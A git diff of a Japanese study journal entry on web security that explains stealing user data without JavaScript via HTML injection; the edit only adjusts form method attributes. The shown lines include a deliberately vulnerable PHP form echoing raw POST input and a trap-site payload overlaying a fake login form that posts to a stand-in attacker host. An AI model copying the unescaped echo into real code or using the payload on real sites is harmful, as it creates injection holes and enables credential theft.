--- a/journals/2023_08_13.md
+++ b/journals/2023_08_13.md
@@ -24,7 +24,7 @@
 				- JavaScriptを使わずにユーザの情報を盗む
 			- \http://example.jpのユーザ情報変更画面(http://example.jp/change)が以下のようになっているとする
 				- ```html
-				  <form action="http://example.jp/confirm">
+				  <form action="http://example.jp/confirm" method="post">
 				  ユーザ名<input type="text" name="name" value="<?php echo @$_POST['name'];?>">
 				  パスワード<input type="password" name="password">
 				  <input type="submit" value="確認画面へ">
@@ -33,7 +33,7 @@
 				- ユーザ名の初期値を表示するために、POSTデータを受け取る(そんなサイトない気がするけど)
 			- 罠サイト
 				- ```html
-				  <form action="http://example.jp/change" method="POST">
+				  <form action="http://example.jp/change" method="post">
 				  <input name="name" type="hidden" value='"></form>
 				  <form style=top:5px;left:5px;position:absolute;z-index:99;background-color:white action=http://trap.example.com method=POST>
 				  ユーザ名<input type="text" name="name">
